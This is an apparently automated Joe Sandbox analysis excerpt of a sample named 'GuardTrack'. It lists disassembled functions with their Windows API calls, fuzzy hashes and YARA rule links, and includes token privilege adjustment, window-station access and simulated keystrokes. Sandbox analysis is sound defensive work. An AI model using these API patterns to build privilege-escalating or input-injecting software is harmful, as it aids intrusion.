Instruction Fuzzy Hash: ADB15D34A0011ADFCB14EF94D855DEEBBB6FF48720F24801AF915A7291EB70A952CF90

Function 005EE2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 005EE2EA

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: a2d2e1b4ad566a7b6937ba8608abb50d3ef21dbd7962695651874e6599f7997b
Instruction ID: 2325e8eb1c6481131e2bb2cacef3e4179a18264afad8ac82f088452ddc08fb4f
Opcode Fuzzy Hash: a2d2e1b4ad566a7b6937ba8608abb50d3ef21dbd7962695651874e6599f7997b
Instruction Fuzzy Hash: 8441F774504351DFDB24DF19C448B5ABBE1BF85304F0988ACE8899B362C336F845CB52

Function 005C49C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 005C4B29: FreeLibrary.KERNEL32(00000000,?), ref: 005C4B63

Part of subcall function 005D547B: __wfsopen.LIBCMT ref: 005D5486

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,005C27AF,?,00000001), ref: 005C49F4

Part of subcall function 005C4ADE: FreeLibrary.KERNEL32(00000000), ref: 005C4B18

Part of subcall function 005C48B0: _memmove.LIBCMT ref: 005C48FA

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 95b2d77ab9130d479d9badb4643690c5b9d82e1c2f8fabe0d438fdb3ce20a1f3
Instruction ID: 3c3d82ff1aa38ac2db7708a13dcac8754d62017ee5a909c39298df30582d5bff
Opcode Fuzzy Hash: 95b2d77ab9130d479d9badb4643690c5b9d82e1c2f8fabe0d438fdb3ce20a1f3
Instruction Fuzzy Hash: 0811C831650206AFDF24FBB08C2AFAE7BA6AF84701F10841DF545A61C1EA749A51AB94

Function 005EE3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 005EE3CE

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: dae69bbb1c959e3e3b1e6ffe7f7f51c22e79ec1d6cb0bde832dd062138629da2
Instruction ID: 9e602c116818b6a14f381e00985be433d0a1dcea87b2dca428847aa393a19da6
Opcode Fuzzy Hash: dae69bbb1c959e3e3b1e6ffe7f7f51c22e79ec1d6cb0bde832dd062138629da2
Instruction Fuzzy Hash: 3F210FB8508341DFEB28DF54C448B5ABBE1BF84304F098968F98A57322D735F849CB92

Function 005C1A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005C1A77

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 76d5dfd19126f7aba3bb295fb5ed34499109e4abbdc830f683e47744b2f34f36
Instruction ID: 5edd89a9af393a63e423a773c3ab7cf4f781e11d22d5afb45b19a63ec767d739
Opcode Fuzzy Hash: 76d5dfd19126f7aba3bb295fb5ed34499109e4abbdc830f683e47744b2f34f36
Instruction Fuzzy Hash: B701A772201B026ED7245B79DC06F67BF98FB45790F10852FF51ACA2D1EA31E4408B94

Function 0062495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00624998

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: 6531743494fca07e043a3e44c55154a41a04da1dfb6d33ab87b26a7399acbaaa
Instruction ID: 2cbbcd84c4958204934e9bb8ed22d5a7655a7a8875d803775675efbc90b335b9
Opcode Fuzzy Hash: 6531743494fca07e043a3e44c55154a41a04da1dfb6d33ab87b26a7399acbaaa
Instruction Fuzzy Hash: AAF03135608105BF9B24FB65D84AD9F7BBDEF85720B00405AF9059B391DE70BD81CB54

Function 005C4A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

_fseek.LIBCMT ref: 005C4AA4

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _fseek
String ID:
API String ID: 2937370855-0
Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction ID: d9a97c69dc8a8c9d4efe208c0da0de1a8839ee3c1bf0d1e8763963df6f426b3b
Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction Fuzzy Hash: 5CF085B6400208BFDF148F84DC04DEBBF7AEB89720F00459DF9045A210D232EA218BA0

Function 005C4A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,005C27AF,?,00000001), ref: 005C4A63

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 8d4c5f61be68b8d0e6c900dc5bd51ee7801c1986466a4b3db80cb788bc36c805
Instruction ID: 2b6272b38d862681e340bcc7845221732de9753e213a7081ba6cd32532c7d15b
Opcode Fuzzy Hash: 8d4c5f61be68b8d0e6c900dc5bd51ee7801c1986466a4b3db80cb788bc36c805
Instruction Fuzzy Hash: 7DF0F271145712CFCB349FA4E8A4E26BFF2FB14325320A92EE5A683610C7319984DF44

Function 005C4AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 005C4AD0

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction ID: 50df58fa2028ce90ecc74e7af042b10c8734511a63789ce543d8b2032cef1bc6
Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction Fuzzy Hash: DAF0F87240020DFFDF05CF94C945EAABB79FB14314F208589F9198A252D336DA61AB91

Function 005D09C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005D09E4

Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 3c88a0200bfd6c451bbee5f8a9ca473cf663b4358a9aa75fb20206394617a607
Instruction ID: be47805c09a9cdcda2733e18f173b00c4790c31566b79f4a1e29a76e1bce2e1c
Opcode Fuzzy Hash: 3c88a0200bfd6c451bbee5f8a9ca473cf663b4358a9aa75fb20206394617a607
Instruction Fuzzy Hash: 5CE086369041295BC72196989C09FEE7BDDEBCA691F0402B6FD08D7204D9709C8186D5

Function 00614D18 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00614D31

Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: FolderPath_memmove
String ID:
API String ID: 3334745507-0
Opcode ID: e70561f4b470b21643fe62edb112ba48c42a0389f1d0808b65ae74421c38e24f
Instruction ID: 9eaf70a2b0ba95019e5bf0317b7fc54e7a69f3cdeb9ba72c40d2c0373e35323d
Opcode Fuzzy Hash: e70561f4b470b21643fe62edb112ba48c42a0389f1d0808b65ae74421c38e24f
Instruction Fuzzy Hash: 4FD05EA590032C6FEB60E6A49C0DDBB7BACE745220F0006A57D5CC3102E9349D4586E0

Function 006177C2 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_000677A8,00000000,00000000,?), ref: 006177DD

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: fa473bd5753252dfc2c6fc5fafbebec892f42dbd71b6e259de884553ad46e8ef
Instruction ID: 19213ab88cfc4603ecede91b1ca16e1c54cd3bc6ee60eef09d6a7a1ae5b977e9
Opcode Fuzzy Hash: fa473bd5753252dfc2c6fc5fafbebec892f42dbd71b6e259de884553ad46e8ef
Instruction Fuzzy Hash: 80D012714683187F67288B65DC46CE776ADE905221744176EBC0582640E6A1BC4086A0

Function 005D547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 005D5486

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: a6ead0a06572a3d196e6935ed0669d63bd9b199368db86fe5bd97a45a83fc884
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 50B09B7544010C77CE111945EC03A553F195740665F404011FB0C1C161B57395605585

Function 005D3588 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

_doexit.LIBCMT ref: 005D3592

Part of subcall function 005D3459: __lock.LIBCMT ref: 005D3467
Part of subcall function 005D3459: DecodePointer.KERNEL32(0066CB70,0000001C,005D33B2,005D1003,00000001,00000000,?,005D3300,000000FF,?,005D9E5E,00000011,005D1003,?,005D9CAC,0000000D), ref: 005D34A6
Part of subcall function 005D3459: DecodePointer.KERNEL32(?,005D3300,000000FF,?,005D9E5E,00000011,005D1003,?,005D9CAC,0000000D), ref: 005D34B7
Part of subcall function 005D3459: EncodePointer.KERNEL32(00000000,?,005D3300,000000FF,?,005D9E5E,00000011,005D1003,?,005D9CAC,0000000D), ref: 005D34D0
Part of subcall function 005D3459: DecodePointer.KERNEL32(-00000004,?,005D3300,000000FF,?,005D9E5E,00000011,005D1003,?,005D9CAC,0000000D), ref: 005D34E0
Part of subcall function 005D3459: EncodePointer.KERNEL32(00000000,?,005D3300,000000FF,?,005D9E5E,00000011,005D1003,?,005D9CAC,0000000D), ref: 005D34E6
Part of subcall function 005D3459: DecodePointer.KERNEL32(?,005D3300,000000FF,?,005D9E5E,00000011,005D1003,?,005D9CAC,0000000D), ref: 005D34FC
Part of subcall function 005D3459: DecodePointer.KERNEL32(?,005D3300,000000FF,?,005D9E5E,00000011,005D1003,?,005D9CAC,0000000D), ref: 005D3507

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Pointer$Decode$Encode$__lock_doexit
String ID:
API String ID: 2158581194-0
Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction ID: 272e6235fa84662b5c98ec9f5e8b88a821ee36a31b3777d12610fc37cd8ab594
Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction Fuzzy Hash: 94B0123198030C33DF212545EC07F153F1C5780B50F100022FA0C1C2E1A5D3766040CA

Non-executed Functions

Function 0063D164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 005B29E2: GetWindowLongW.USER32(?,000000EB), ref: 005B29F3

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0063D208
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0063D249
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0063D28E
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0063D2B8
SendMessageW.USER32 ref: 0063D2E1
_wcsncpy.LIBCMT ref: 0063D359
GetKeyState.USER32(00000011), ref: 0063D37A
GetKeyState.USER32(00000009), ref: 0063D387
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0063D39D
GetKeyState.USER32(00000010), ref: 0063D3A7
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0063D3D0
SendMessageW.USER32 ref: 0063D3F7
SendMessageW.USER32(?,00001030,?,0063B9BA), ref: 0063D4FD
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0063D513
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0063D526
SetCapture.USER32(?), ref: 0063D52F
ClientToScreen.USER32(?,?), ref: 0063D594
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0063D5A1
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0063D5BB
ReleaseCapture.USER32 ref: 0063D5C6
GetCursorPos.USER32(?), ref: 0063D600
ScreenToClient.USER32(?,?), ref: 0063D60D
SendMessageW.USER32(?,00001012,00000000,?), ref: 0063D669
SendMessageW.USER32 ref: 0063D697
SendMessageW.USER32(?,00001111,00000000,?), ref: 0063D6D4
SendMessageW.USER32 ref: 0063D703
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0063D724
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0063D733
GetCursorPos.USER32(?), ref: 0063D753
ScreenToClient.USER32(?,?), ref: 0063D760
GetParent.USER32(?), ref: 0063D780
SendMessageW.USER32(?,00001012,00000000,?), ref: 0063D7E9
SendMessageW.USER32 ref: 0063D81A
ClientToScreen.USER32(?,?), ref: 0063D878
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0063D8A8
SendMessageW.USER32(?,00001111,00000000,?), ref: 0063D8D2
SendMessageW.USER32 ref: 0063D8F5
ClientToScreen.USER32(?,?), ref: 0063D947
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0063D97B

Part of subcall function 005B29AB: GetWindowLongW.USER32(?,000000EB), ref: 005B29BC

GetWindowLongW.USER32(?,000000F0), ref: 0063DA17

Strings

@GUI_DRAGID, xrefs: 0063D562
F, xrefs: 0063D8FB

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: ccf74a1ad9732b1b4c2c2df51844419997d7a3d1532830552bfb9b57811df37a
Instruction ID: 8193336f0845e32f9ff37aa835e9ac64c0bd55a086e2afea66c8bb51c9e18c16
Opcode Fuzzy Hash: ccf74a1ad9732b1b4c2c2df51844419997d7a3d1532830552bfb9b57811df37a
Instruction Fuzzy Hash: 8542AE74204341AFD724DF28D848FAABBE6FF8A310F140619F699873A1C771E955CB92

Function 005C5EDA Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 005C5EE2
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006010D7
IsIconic.USER32(?), ref: 006010E0
ShowWindow.USER32(?,00000009), ref: 006010ED
SetForegroundWindow.USER32(?), ref: 006010F7
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0060110D
GetCurrentThreadId.KERNEL32 ref: 00601114
GetWindowThreadProcessId.USER32(?,00000000), ref: 00601120
AttachThreadInput.USER32(?,00000000,00000001), ref: 00601131
AttachThreadInput.USER32(?,00000000,00000001), ref: 00601139
AttachThreadInput.USER32(00000000,?,00000001), ref: 00601141
SetForegroundWindow.USER32(?), ref: 00601144
MapVirtualKeyW.USER32(00000012,00000000), ref: 00601159
keybd_event.USER32(00000012,00000000), ref: 00601164
MapVirtualKeyW.USER32(00000012,00000000), ref: 0060116E
keybd_event.USER32(00000012,00000000), ref: 00601173
MapVirtualKeyW.USER32(00000012,00000000), ref: 0060117C
keybd_event.USER32(00000012,00000000), ref: 00601181
MapVirtualKeyW.USER32(00000012,00000000), ref: 0060118B
keybd_event.USER32(00000012,00000000), ref: 00601190
SetForegroundWindow.USER32(?), ref: 00601193
AttachThreadInput.USER32(?,?,00000000), ref: 006011BA

Strings

Shell_TrayWnd, xrefs: 006010D2

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 8a64ca36e4f38157b5efde9e60346c3d7997b2b2dedcfa0de1bebe83c92b924a
Instruction ID: 85ff64b84ede1113926cdbbd53ee498c185212ba195b13f52fd69d2dcc496c33
Opcode Fuzzy Hash: 8a64ca36e4f38157b5efde9e60346c3d7997b2b2dedcfa0de1bebe83c92b924a
Instruction Fuzzy Hash: 1A31A775A803287FFB241BA19C49F7F3E6EEB45B50F104055FB05AA1D0CA705D51AEA0

Function 00608F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00609399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006093E3
Part of subcall function 00609399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00609410
Part of subcall function 00609399: GetLastError.KERNEL32 ref: 0060941D

_memset.LIBCMT ref: 00608F71
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00608FC3
CloseHandle.KERNEL32(?), ref: 00608FD4
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00608FEB
GetProcessWindowStation.USER32 ref: 00609004
SetProcessWindowStation.USER32(00000000), ref: 0060900E
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00609028

Part of subcall function 00608DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00608F27), ref: 00608DFE
Part of subcall function 00608DE9: CloseHandle.KERNEL32(?,?,00608F27), ref: 00608E10

Strings

, xrefs: 00608F80
winsta0, xrefs: 00608FE6
default, xrefs: 00609023

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: e2dd2abec9000305ecb65448176fb424230031d8552921307dbe08ab4cff4702
Instruction ID: 6e0b71098bc3fb1d8083c3eea1a6cbe6a37c8f2cb31588d66c077e21482a8fc9
